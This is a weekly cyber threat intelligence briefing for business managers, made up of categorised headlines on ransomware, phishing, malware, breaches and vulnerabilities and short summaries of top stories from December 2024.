How to mitigate wiper malware | TechTarget

Ransomware Victims

46% of financial institutions had a data breach in the past 24 months - Help Net Security

Clop ransomware claims responsibility for Cleo data theft attacks

How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch

The Bookseller - News - Waterstones hit by Blue Yonder ransomware gang attack

Ransomware Gang Says Deloitte Sucks at Their Job - Going Concern

Rhode Island confirms data breach after Brain Cipher ransomware attack

Major Auto Parts Firm LKQ Hit by Cyber Attack - SecurityWeek

Phishing & Email Based Attacks

How Companies Lose Millions Of Dollars To Phishing

Cofense report warns of credential-harvesting attacks that spoof Proofpoint, Mimecast and Virtru - SiliconANGLE

Credential phishing attacks up over 700 percent

Midnight Blizzard Taps Phishing Emails, Rogue RDP Nets

Phishing Attacks Double in 2024 - Infosecurity Magazine

Credential phishing attacks rose by 703% in H2 of 2024 | Security Magazine

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

Organisations Warned of Rise in Okta Support Phishing Attacks - SecurityWeek

Google Calendar invites spoofed in phishing campaign • The Register

Crooks use Docusign lures to attempt Azure account takeovers • The Register

Credential phishing attacks surge, report reveals | SC Media

Executives targeted in mobile spearphishing attacks | Security Magazine

YouTube Channels Targeted With Windows Malware Phishing Attacks

Inside the latest phishing campaigns: dissecting CarPhish, EDG, Tpass, and Mamba2FA kits - VMRay

HubPhish Exploits HubSpot Tools to Target 20,000 European Users for Credential Theft

HubSpot phishing targets 20,000 Microsoft Azure accounts

European firms subjected to HubSpot-exploiting phishing | SC Media

New fake Ledger data breach emails try to steal crypto wallets

New Gmail Security Warning For 2.5 Billion—Second Attack Wave Incoming

Other Social Engineering

FTC warns of online task job scams hooking victims like gambling

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Cyber Criminals Exploit Google Calendar to Spread Malicious Links - Infosecurity Magazine

Microsoft Teams Vishing Spreads DarkGate RAT

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

‘Tis the Season to Be Alert for Cyber Threats: 5 Unjoyful… | Intel 471

Cyber security is never out-of-office: Protecting your business anytime, anywhere

Interpol: Stop calling it 'pig butchering' • The Register

Now Scammers Are Abusing Legitimate Services to Show You Fake CAPTCHAs

Watch Out for These Holiday Cyber Attacks

Artificial Intelligence

The threat of AI-driven cyber warfare is real and it can disrupt the world

Ransomware, deepfakes, and scams: the digital landscape in 2024 | TechRadar

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Bosses struggle to police workers’ use of AI

How weaponized AI drives CISO burnout – and what to do about it | SC Media

With 'TPUXtract,' Attackers Can Steal Orgs' AI Models

Identity fraud attacks using AI are fooling biometric security systems | TechRadar

Cyberint's 2024 Report Highlights Surge in Credential Theft and Rise of AI-Powered Phishing - IT Security Guru

Cloud Threat Landscape Report: AI-generated attacks low for the cloud

2024 Cyber Review: Trump Re-Election Eclipses AI and Ransomware Stories

AI is becoming the weapon of choice for cyber criminals - Help Net Security

Cyber leaders are bullish on generative AI despite risks: report | CIO Dive

The Year of Global AI and Cyber Security Regulations: 7 GRC Predictions for 2025 - Security Boulevard

Malvertisers Fool Google With AI-Generated Decoys

Malware

How infostealers are used in targeted cyber attacks

Microsoft Teams Vishing Spreads DarkGate RAT

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

Winnti hackers target other threat actors with new Glutton PHP backdoor

PHP backdoor looks to be work of Chinese-linked APT group | CyberScoop

Google, Amnesty International uncover new surveillance malware | SC Media

FBI spots HiatusRAT malware attacks targeting web cameras, DVRs

Hackers Exploit Webview2 to Deploy CoinLurker Malware and Evade Security Detection

Malvertising on steroids serves Lumma infostealer - Help Net Security

That cheap webcam? HiatusRAT may be targeting it, FBI warns | CSO Online

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

YouTube Creators Targeted in Major Phishing Campaign - Infosecurity Magazine

How to mitigate wiper malware | TechTarget

Evasive Node.js loader masquerading as game hack - Help Net Security

The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal

FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems - SecurityWeek

A new antivirus model to fight against evasive malware - Diari digital de la URV

Critical flaw in WordPress plugin exploited to install malicious software | SC Media

Bitter APT Targets Turkish Defence Sector with WmRAT and MiyaRAT Malware

Thai Police Systems Under Fire From 'Yokai' Backdoor

Lazarus targets nuclear-related organisation with new malware | Securelist

Malicious Microsoft VSCode extensions target devs, crypto community

Bots/Botnets

Mirai botnet targets SSR devices, Juniper Networks warns

Juniper Warns of Mirai Botnet Targeting Session Smart Routers - SecurityWeek

Mobile

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

Addressing BYOD Vulnerabilities in the Workplace - Security Boulevard

This Nasty Android Malware Is Picking Up Pace and Targeting Certain Devices

Executives targeted in mobile spearphishing attacks | Security Magazine

BadBox malware botnet infects 192,000 Android devices despite disruption

Serbian police used Cellebrite to unlock, then plant spyware, on a journalist's phone | TechCrunch

Authorities abroad use phone-cracking tools to install spyware, report says - The Washington Post

New Android NoviSpy spyware linked to Qualcomm zero-day bugs

Why you should not give your phone charger to others? Hackers can steal data. Tips to stay safe - The Economic Times

Hackers are using the Amazon Appstore to spread malware — delete this malicious app now | Tom's Guide

Internet of Things – IoT

Chinese wi-fi tech used in British homes investigated over hacking fears

Concerns over consumer surveillance in some smart devices | News UK Video News | Sky News

Multiple flaws in Volkswagen Group's infotainment unit allow for vehicle compromise

FBI spots HiatusRAT malware attacks targeting web cameras, DVRs

That cheap webcam? HiatusRAT may be targeting it, FBI warns | CSO Online

Zero Day Initiative — Detailing the Attack Surfaces of the Tesla Wall Connector EV Charger

Mirai botnet targets SSR devices, Juniper Networks warns

Juniper Warns of Mirai Botnet Targeting Session Smart Routers - SecurityWeek

FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems - SecurityWeek

Germany blocks BadBox malware loaded on 30,000 Android devices

Data Breaches/Leaks

46% of financial institutions had a data breach in the past 24 months - Help Net Security

Huge cyber crime attack sees 390,000 WordPress websites hit, details stolen | TechRadar

Hacker Leaks Cisco Data - SecurityWeek

Cyber Security Incident at Deloitte May Be Responsible for RIBridges Data Breach | Console and Associates, P.C. - JDSupra

Consumers wrongly attribute all data breaches to cyber criminals - Help Net Security

Millions stolen from LastPass users in massive attack — what you need to know | Tom's Guide

390,000+ WordPress Credentials Stolen via Malicious GitHub Repository Hosting PoC Exploits

LastPass threat actor steals $5.4M from victims just a week before Xmas

Deloitte handling 'major' cyber attack on Rhode Island system • The Register

Nearly 400,000 WordPress credentials stolen | Security Magazine

LastPass breach comes back to haunt users as hackers steal $12 million in two days – DataBreaches.Net

LastPass Hackers Allegedly Stole $5 Million This Week—Report

How common are consumer data breaches? | Chain Store Age

Texas Tech University System data breach impacts 1.4 million patients

Meta Fined $264M for Security Breach in Facebook's 'View As' Feature - CNET

Rhode Island Residents’ Data Breached in Large Cyber Attack; Data May Be Leaked Soon – DataBreaches.Net

International Development Firm Chemonics Sued Over Breach (1)

900,000 People Impacted by ConnectOnCall Data Breach - SecurityWeek

Regional Care Data Breach Impacts 225,000 People - SecurityWeek

Organised Crime & Criminal Actors

Consumers wrongly attribute all data breaches to cyber criminals - Help Net Security

UK’s internet watchdog unveils online criminal crackdown

Ofcom Issues Guidance for Tech Firms to Tackle Online Harms - Infosecurity Magazine

Major cyber crime crackdowns signal a shift in global cyber security strategies - Policing Insight

Texan man gets 30 years in prison for running CSAM exchange • The Register

Bobbies on the beat won't stop the cyber crime wave | The Spectator

Why Are Crypto Scammers (And Not Hackers) Looking For You? | HackerNoon

Hacker sentenced to 69 months for stealing payment card info | SC Media

Cryptocurrency hackers stole $2.2 billion from platforms in 2024 - Help Net Security

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

Cyber Criminals and the SEC: What Companies Need to Know

Trump to Wage War on Cyber Criminals, Says Advisor

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

LastPass threat actor steals $5.4M from victims just a week before Xmas

Hackers Exploit Webview2 to Deploy CoinLurker Malware and Evade Security Detection

LastPass breach comes back to haunt users as hackers steal $12 million in two days – DataBreaches.Net

Why Are Crypto Scammers (And Not Hackers) Looking For You? | HackerNoon

Cryptocurrency hackers stole $2.2 billion from platforms in 2024 - Help Net Security

North Korean Hackers Stole $1.3 Billion in Crypto in 2024

New fake Ledger data breach emails try to steal crypto wallets

Crypto Hacks in 2024: Centralized Exchanges Are Now the Top Targets for Cyber Criminals

Interpol: Stop calling it 'pig butchering' • The Register

Crypto holder loses assets priced at $2.5 million

Malicious Microsoft VSCode extensions target devs, crypto community

Insider Risk and Insider Threats

Kroll Settles With Ex-Employees Over Cyber Security Trade Secrets

GCHQ worker accused of taking top secret data home - BBC News

Protecting IP in a Cyber-Threatened World: Insights from Zifino and Foley & Lardner | Foley & Lardner LLP - JDSupra

Insurance

Lloyd's of London Launches New Cyber Insurance Consortium

What will happen in the cyber insurance space during 2025? | Insurance Business America

Supply Chain and Third Parties

Supply Chain Risk Mitigation Must Be a Priority in 2025

Cyber Security Incident at Deloitte May Be Responsible for RIBridges Data Breach | Console and Associates, P.C. - JDSupra

Deloitte handling 'major' cyber attack on Rhode Island system • The Register

Harnessing Threat Intel and Automation to Counter Supply Chain Risks | MSSP Alert

Property deals hit by IT security failure at search service

CERT-UA: Russia-linked UAC-0125 abuses Cloudflare Workers to target Ukrainian army

Cloud/SaaS

Clop is back to wreak havoc via vulnerable file-transfer software | CyberScoop

Crooks use Docusign lures to attempt Azure account takeovers • The Register

SaaS: The Next Big Attack Vector | Grip Security - Security Boulevard

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Crooks use Docusign lures to attempt Azure account takeovers • The Register

CISA issues new directive to bolster cloud security – and Microsoft was singled out | ITPro

Ransomware attacks exploit Cleo bug as Cl0p claims it • The Register

US Government Issues Cloud Security Requirements for Federal Agencies - Infosecurity Magazine

Cloud Threat Landscape Report: AI-generated attacks low for the cloud

HubSpot phishing targets 20,000 Microsoft Azure accounts

European firms subjected to HubSpot-exploiting phishing | SC Media

Microsoft 365 users hit by random product deactivation errors

Identity and Access Management

Why Role-Based Access Control is Critical to Your Security Stack | MSSP Alert

Proactive Approaches to Identity and Access Management - Security Boulevard

Security Leaders Say Machine Identities – Such as Access Tokens and Service Accounts – Are Next Big Target for Cyber Attack | Business Wire

Machine identity attacks will be top of mind for security leaders in 2025 | ITPro

Encryption

The Simple Math Behind Public Key Cryptography | WIRED

Why 2025 Will Be Pivotal in Our Defence Against Quantum Threat

Passwords, Credential Stuffing & Brute Force Attacks

"Password Era is Ending " Microsoft to Delete 1 Billion Password to Replace "Passkey"

Millions stolen from LastPass users in massive attack — what you need to know | Tom's Guide

Credential phishing attacks rose by 703% in H2 of 2024 | Security Magazine

LastPass threat actor steals $5.4M from victims just a week before Xmas

390,000+ WordPress Credentials Stolen via Malicious GitHub Repository Hosting PoC Exploits

LastPass 2022 hack fallout continues with millions of dollars more reportedly stolen | TechRadar

Nearly 400,000 WordPress credentials stolen | Security Magazine

HubPhish Exploits HubSpot Tools to Target 20,000 European Users for Credential Theft

What is a Compromised Credentials Attack?  - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

Cyberint's 2024 Report Highlights Surge in Credential Theft and Rise of AI-Powered Phishing - IT Security Guru

Social Media

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Study reveals vulnerability of metaverse platforms to cyber attacks

YouTube Creators Targeted in Major Phishing Campaign - Infosecurity Magazine

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

Meta fined for 2018 breach that exposed 30M accounts • The Register

Malvertising

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Fake Captcha Campaign Highlights Risks of Malvertising Networks - Infosecurity Magazine

Malvertising on steroids serves Lumma infostealer - Help Net Security

Malvertisers Fool Google With AI-Generated Decoys

Regulations, Fines and Legislation

UK’s internet watchdog unveils online criminal crackdown

Ofcom Issues Guidance for Tech Firms to Tackle Online Harms - Infosecurity Magazine

Why We Should Insist on Future-Proofing Cyber Security Regulatory Frameworks - Security Boulevard

Why the UK's "outdated" cyber security legislation needs an urgent refresh | ITPro

Hundreds of websites to shut down under UK's 'chilling' internet laws

The Top Cyber Security Agency in the US Is Bracing for Donald Trump | WIRED

EU Sanctions Russian Cyber Actors for “Destabilizing Actions” - Infosecurity Magazine

With DORA approaching, financial institutions must strengthen their cyber resilience - Help Net Security

Understanding NIS2: Essential and Important Entities - Security Boulevard

Study finds ‘significant uptick’ in cyber security disclosures to SEC | CyberScoop

The Year of Global AI and Cyber Security Regulations: 7 GRC Predictions for 2025 - Security Boulevard

Meta Fined $264M for Security Breach in Facebook's 'View As' Feature - CNET

Meta fined for 2018 breach that exposed 30M accounts • The Register

Trump Looks to Go 'On the Offense' Against Cyber Attackers

Models, Frameworks and Standards

How the cyber security landscape affects the financial sector

An easy to follow NIST Compliance Checklist - Security Boulevard

With DORA approaching, financial institutions must strengthen their cyber resilience - Help Net Security

Understanding NIS2: Essential and Important Entities - Security Boulevard

Using CIS Benchmarks to Assess Your System Security Posture | MSSP Alert

NIS2 Penetration Testing and Compliance - Security Boulevard

Backup and Recovery

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

Careers, Working in Cyber and Information Security

Closing the SMB cyber security skills gap: Key steps | SC Media

Leadership in Cyber Security: A Guide to Your First Role

The key to growing a cyber security career are soft skills - Security Boulevard

Law Enforcement Action and Take Downs

Major cyber crime crackdowns signal a shift in global cyber security strategies - Policing Insight

Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop

Texan man gets 30 years in prison for running CSAM exchange • The Register

Man Accused of SQL Injection Hacking Gets 69-Month Prison Sentence  - SecurityWeek

Hacker sentenced to 69 months for stealing payment card info | SC Media

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

Dodgy Firestick crackdown: full list of UK areas targeted by police

Germany blocks BadBox malware loaded on 30,000 Android devices

Romanian Netwalker ransomware affiliate sentenced to 20 years in prison

Misinformation, Disinformation and Propaganda

Romania’s election was target of cyber attacks and misinformation, parliament finds

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Nation State Actors

China

Chinese wi-fi tech used in British homes investigated over hacking fears

Feds Investigate, Mull Ban on Chinese-Made Routers | Newsmax.com

TP-Link routers could be banned in the US over national security concerns | TechSpot

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

PHP backdoor looks to be work of Chinese-linked APT group | CyberScoop

Trump security advisor urges offensive cyber attacks on China • The Register

Russia

Russia Recruits Ukrainian Children for Sabotage and Reconnaissance - Infosecurity Magazine

Ukrainian Minors Recruited for Cyber Ops and Reconnaissance in Russian Airstrikes

Midnight Blizzard Taps Phishing Emails, Rogue RDP Nets

EU Sanctions Russian Cyber Actors for “Destabilizing Actions” - Infosecurity Magazine

Romania’s election was target of cyber attacks and misinformation, parliament finds

Russian hackers use RDP proxies to steal data in MiTM attacks

APT29 group used red team tools in rogue RDP attacks

CERT-UA: Russia-linked UAC-0125 abuses Cloudflare Workers to target Ukrainian army

Ukraine's Defence Minister agrees with US to deepen cooperation in cyber security | Ukrainska Pravda

Largest cyber attack on Ukraine's state registers: Ministry of Justice systems shut down | Ukrainska Pravda

Russian FSB relies on Ukrainian minors for criminal activities disguised as "quest games"

Recorded Future CEO applauds "undesirable" designation by Russia

US Organisations Still Using Kaspersky Products Despite Ban - Infosecurity Magazine

Russia spent €69mn on propaganda and interference in Bulgaria and Romania, Bulgarian cyber security group reveals

Iran

Iran crew used 'cyberweapon' against US critical infra • The Register

North Korea

North Korean Hackers Stole $1.3 Billion in Crypto in 2024

Lazarus targets nuclear-related organisation with new malware | Securelist

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal

Bitter APT Targets Turkish Defence Sector with WmRAT and MiyaRAT Malware

Serbian police used Cellebrite to unlock, then plant spyware, on a journalist's phone | TechCrunch

Authorities abroad use phone-cracking tools to install spyware, report says - The Washington Post

New Android NoviSpy spyware linked to Qualcomm zero-day bugs

Tools and Controls

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

From digital risk to physical threat: Why cyber security must evolve for executives | SC Media

Why Role-Based Access Control is Critical to Your Security Stack | MSSP Alert

Addressing BYOD Vulnerabilities in the Workplace - Security Boulevard

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

Hackers Scanning RDP Services Especially Port 1098 For Exploitation

To Defeat Cyber Criminals, Understand How They Think

Are threat feeds masking your biggest security blind spot? - Help Net Security

The evolution of incident response: building a successful strategy | TechRadar

New APIs Discovered by Attackers in Just 29 Seconds - Infosecurity Magazine

Harnessing Threat Intel and Automation to Counter Supply Chain Risks | MSSP Alert

Penetration testing – a critical component of financial cyber security in 2025

Machine identity attacks will be top of mind for security leaders in 2025 | ITPro

The pros and cons of biometric authentication | TechTarget

Wallarm Releases API Honeypot Report Highlighting API Attack Trends

Might need a mass password reset one day? Read this first.

The evolution of incident response: building a successful strategy | TechRadar

Making smart cyber security spending decisions in 2025

Why You Must Replace Your Legacy SIEM and Migrate to Modern SIEM Analytics? - IT Security Guru

Russian hackers use RDP proxies to steal data in MiTM attacks

APT29 group used red team tools in rogue RDP attacks

What will happen in the cyber insurance space during 2025? | Insurance Business America

Is Your Cloud Infrastructure Truly Protected? - Security Boulevard

The Feds Have Some Advice for 'Highly Targeted' Individuals: Don't Use a VPN

Gaining Confidence Through Effective Secrets Vaulting - Security Boulevard

NCSC Mail Check Changes & Their Impact on UK Public Sector Email Security - Security Boulevard

Reports Published in the Last Week

Potential Risks to Financial Stability: The Financial Stability Oversight Council’s 2024 Annual Report | BakerHostetler - JDSupra

Other News

Hackers Scanning RDP Services Especially Port 1098 For Exploitation

Travel Cyber Security Threats and How to Stay Protected - Security Boulevard

Schools Need Improved Cyber Education (Urgently) - IT Security Guru

Study reveals vulnerability of metaverse platforms to cyber attacks

WiFi hacking for the everyday spy | Cybernews

Leadership skills for managing cyber security during digital transformation - Help Net Security

UK businesses risk disruption as PSTN switch-off approaches | Computer Weekly

MSSP Market Update: Fortune 500 Firms Fail at Cyber Security | MSSP Alert

2025 is set to bring changes in technology adoption and the evolving attack surface

Cyber Security In 2025 – A New Era Of Complexity

The Feds Have Some Advice for 'Highly Targeted' Individuals: Don't Use a VPN

Resolve to Be Resilient: Top Cyber Priorities for State and Local Government

Cyber Security Threats to Our Most Basic Needs

Cyber Security in the legal sector: awareness & proactive strategies - Legal News

Global cyber security impact on food and drink firms

Inform: The cyber complexities facing local government | UKAuthority

Santa-hacking - how to carry out a cyber attack on Father Christmas - Prolific North

Watch Out for These Holiday Cyber Attacks

How to tell if a USB cable is hiding malicious hacker hardware | PCWorld

Inform: The cyber complexities facing local government | UKAuthority

The Education Industry: Why Its Data Must Be Protected

How fan engagement impacts cyber security in sports - Verdict

Why cyber security is critical to energy modernization - Help Net Security

Vulnerability Management

Are threat feeds masking your biggest security blind spot? - Help Net Security

Drowning in Visibility? Why Cyber Security Needs to Shift from Visibility to Actionable Insight - Security Boulevard

No, Microsoft has not 'reversed course' on Windows 11 hardware requirements | ZDNET

Vulnerabilities

2024 Sees Sharp Increase in Microsoft Tool Exploits - Infosecurity Magazine

Patch Alert: Critical Apache Struts Flaw Found, Exploitation Attempts Detected

Critical OpenWrt Vulnerability Exposes Devices to Malicious Firmware Injection

Microsoft Patches Vulnerabilities in Windows Defender, Update Catalog  - SecurityWeek

Citrix shares mitigations for ongoing Netscaler password spray attacks

Cleo MFT Zero-Day Exploits Are About Escalate

Over 25,000 SonicWall VPN Firewalls exposed to critical flaws

Windows kernel bug now exploited in attacks to gain SYSTEM privileges

Clop ransomware group claims responsibility for exploiting Cleo file transfer vulnerabilities

Over 300 orgs compromised through several DrayTek exploits | SC Media

Fortinet warns about Critical flaw in Wireless LAN Manager FortiWLM

Chrome 131 Update Patches High-Severity Memory Safety Bugs - SecurityWeek

Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

Hackers are abusing Microsoft tools more than ever before | TechRadar

BeyondTrust Patches Critical Vulnerability Discovered During Security Incident Probe - SecurityWeek

Microsoft confirms critical Windows Defender vulnerability. What you need to do right now. | Mashable

New Apache Tomcat Vulnerabilities Let Attackers Execute Remote Code

Undocumented DrayTek Vulnerabilities Exploited to Hack Hundreds of Orgs - SecurityWeek

Critical flaw in WordPress plugin exploited to install malicious software | SC Media

Researchers claim an AMD security flaw could let hackers access encrypted data | ITPro

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week 

Cyber Security Risks Rise During Mergers & Acquisitions

ReliaQuest’s analysis reveals heightened cyber security risks during mergers and acquisitions, with half of incidents stemming from threat actors exploiting potential security gaps, and the remainder from non-malicious employee issues. The manufacturing, finance and retail sectors were the hardest hit. One private equity CISO observed a 400% surge in phishing attempts post-M&A announcements. Key risks include phishing attacks, data leaks, and vulnerabilities due to legacy systems. ReliaQuest recommends proactive strategies like pre-due-diligence assessments, training, network segmentation, and unified logging to mitigate these risks and ensure smoother integration during M&As.

Ransomware Gangs’ Merciless Attacks Bleed Small Companies Dry

Ransomware attacks surged by 70% in 2023, hitting 4,611 reported incidents according to industry research, with one gang alone extorting an estimated $42 million. Around 80% of victims are small and medium-size organisations. Many rely on cyber security insurance with limits around £1 million, yet the median ransom soared to $6.5 million this year. This gap between insurance coverage and actual costs has driven some companies into administration. Experts warn that, although attackers often use unsophisticated techniques, they remain ruthless. Robust monitoring software, password protection and comprehensive incident response plans can provide critical defences against this escalating threat.

AI & Cyber Security to Shape the Tech Landscape in 2025

The tech landscape of 2025 will be defined by the growth of specialised AI solutions and evolving cyber security measures, according to sector leaders from Nutanix, Rubrik, Snowflake, Obsidian Security, ManageEngine, and Infoblox. Cloud-based AI agents will automate threat detection, but also heighten risks of data leaks and identity-based attacks. Industry-specific models will transform finance, healthcare, manufacturing, and hospitality, offering faster, more precise services. Organisations must enhance data access controls, involve all staff in cyber security, and align IT and business goals. Government regulations and platform-based strategies will play a critical role in supporting innovation and safeguarding operations.

Phishing: The Silent Precursor to Data Breaches

Phishing remains a silent precursor to destructive data breaches, accounting for 31% of cyber security incidents - outdone only by weak or compromised credentials and pretexting. By exploiting human psychology, phishing bypasses technological safeguards, enabling the theft of sensitive data and triggering large-scale cyber attacks. One major infrastructure breach was initiated through a phishing-driven compromise, underscoring the threat’s far-reaching impact. Organisations can reduce phishing risks by prioritising employee training, filtering malicious emails, and implementing multi-factor authentication. This multi-layered approach, combined with a strong incident response plan, is essential to help safeguard systems and protect sensitive information in the modern cyber threat landscape.

Business Cyber Understanding Gap Creates New Vulnerabilities

Cyber security insurance provider Resilience has found that many UK mid-to-large businesses lack a clear grasp of cyber security as a financial risk, despite 74% having experienced cyber crime. The survey of IT and financial leaders highlighted a worrying gap between media focus on data breaches (cited by 72% as their main worry) and the larger financial impact of ransomware (responsible for more than 80% of losses). Limited use of quantitative risk registries (54%) further hampers businesses’ ability to mitigate cyber threats.

Cyber Defence vs Cyber Resilience: Why It's Time to Prioritise Recovery

AI-driven cyber attacks are prevalent, with intruders able to remain undetected for months and most ransomware campaigns targeting backup repositories. This demands a shift from solely cyber defence to holistic cyber resilience. A strategy includes a robust backup approach, active monitoring, and an isolated recovery environment to ensure data remains clean and recoverable. Equally important is cross-functional collaboration between IT and security teams to flag and respond to breaches quickly. By prioritising recovery and resilience, organisations can maintain business operations, minimise downtime, and stay ahead of evolving cyber threats in today’s borderless IT landscape.

UK SMEs Are Concerned About Preparedness for Cyber Attacks as Fraud Rises

Online payment provider Mollie has reported that five and a half million UK SMEs lost an average of £10,800 to fraud this year, leaving nine in 10 C-Suite executives concerned about their survival. Fraud types included phishing (58%), refund scams (42%), account takeovers (30%) and carding attacks (23%). Firms spent around 15 days annually handling these threats, diverting critical resources from core operations. This underscores a growing need for effective cyber security measures that combat rising threats without stifling business growth. Mollie’s research highlights the importance of equipping smaller enterprises with balanced solutions to safeguard revenue and productivity, protecting them from ever-evolving forms of cyber attack.

Cyber Risk to Intensify in 2025 as Attackers Switch Tactics - Moody’s

According to Moody’s 2025 cyber security outlook, the threat environment is evolving as attackers target bigger businesses and harness AI for more potent attacks. Ransomware soared by 70% from 2022 to 2023, with ransom payments hitting a record $1.1 billion. Meanwhile, the share of victims paying ransoms is falling, driving cyber criminals to focus on larger organisations. Supply chain incidents are growing in parallel with the proliferation of AI-enabled scams and greater reliance on external providers. Moody’s recommends warns that robust risk assessments and improved cyber security measures, including passkeys, can help address these mounting challenges.

Companies Pull Leadership Bios from Their Websites After Insurance Executive’s Killing

Following the tragic shooting of a leading insurance executive in New York City, major health insurers have swiftly removed leadership bios from their websites. Archived versions of UnitedHealthcare, Anthem Blue Cross Blue Shield, and Elevance Health pages show these details were public until shortly after the incident. Faced with heightened security concerns, organisations are reinforcing protective measures, while private security firms report a surge in new business. This underscores an evolving risk landscape for senior leaders, prompting companies to carefully manage executive information online and reassess personal safety protocols.

Boardroom Risks Revealed in Latest Beazley Report

Beazley’s latest report highlights cyber security as the top boardroom concern, cited by 45% of executives. Regulatory compliance (41%) and ESG (35%) follow closely, yet 60% of respondents feel only moderately or poorly prepared for cyber attacks. ESG influences are expected to surge, with 68% foreseeing major board impact, but just 39% feel ready. The report urges proactive risk management, encouraging boards to strengthen internal expertise, invest in technology, and align governance strategies with shifting priorities.

Employee Visits to Adult or Gambling Sites Doubles Risk of Infection by Malware

According to new research, employees visiting gambling or adult sites can double the risk of malware infections, including coinminers, trojans, and hacking tools. Browsing illegal sites may increase malware threats by up to five times, while frequent visits to unknown websites also raise infection odds. By identifying how specific user behaviours relate to distinct malware types, organisations can tailor their cyber security defences accordingly. Governments might prioritise hacktools, whereas healthcare could focus on ransomware. Overall, the study suggests that targeted, behaviour-based cyber security measures can help organisations reduce risks cost-effectively for their unique threat profiles.

North Korea's Fake IT Worker Scam Hauled in at Least $88 Million Over Six Years

North Korea’s covert IT workforce has reportedly generated $88 million over six years by posing as remote tech professionals, according to the US Department of Justice. Hiding their true identities and locations, these “IT warriors” channel their earnings into Pyongyang’s coffers, while some leverage access privileges to steal proprietary data and extort employers. Even cyber security businesses have been duped. Authorities have uncovered over 130 participants, linked to firms in China and Russia. Officials warn the threat persists, with continued guidance on detecting the scam and a multimillion-dollar reward in place to disrupt North Korea’s illicit revenue streams.

Sources:

https://securitybrief.co.nz/story/cybersecurity-risks-rise-during-mergers-acquisitions

https://www.claimsjournal.com/news/national/2024/12/06/327772.htm

https://securitybrief.co.nz/story/ai-cybersecurity-to-shape-the-tech-landscape-in-2025

https://www.securityweek.com/phishing-the-silent-precursor-to-data-breaches/

https://www.emergingrisks.co.uk/business-cyber-understanding-gap-creates-new-vulnerabilities/

https://betanews.com/2024/12/06/cyber-defense-vs-cyber-resilience-why-its-time-to-prioritize-recovery/

https://thefintechtimes.com/uk-smes-are-concerned-about-preparedness-for-cyberattacks-as-fraud-rises-finds-mollie/

https://www.reinsurancene.ws/cyber-risk-to-intensify-in-2025-as-attackers-switch-tactics-moodys/

https://fortune.com/2024/12/06/unitedhealthcare-major-insurance-companies-pull-company-board-leadership-bios-elevance-anthem-blue-shield-cross/

https://www.insurancebusinessmag.com/us/news/breaking-news/boardroom-risks-revealed-in-latest-beazley-report-516949.aspx

https://www.newswise.com/articles/employee-visits-to-adult-or-gambling-sites-doubles-risk-of-infection-by-malware

https://www.theregister.com/2024/12/13/doj_dpkr_fake_tech_worker_indictment/

Governance, Risk and Compliance

UK SMEs Are Concerned About Preparedness For Cyber Attacks as Fraud Rises Finds Mollie | The Fintech Times

Cyber security risks rise during mergers & acquisitions

Boardroom risks revealed in latest Beazley report | Insurance Business America

UnitedHealthcare and other major insurance companies pull company and board leadership bios from their websites after executive’s killing | Fortune

Dear CEO: It’s time to rethink security leadership and empower your CISO | CSO Online

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

We must adjust expectations for the CISO role - Help Net Security

Cyber defence vs cyber resilience: why it's time to prioritize recovery

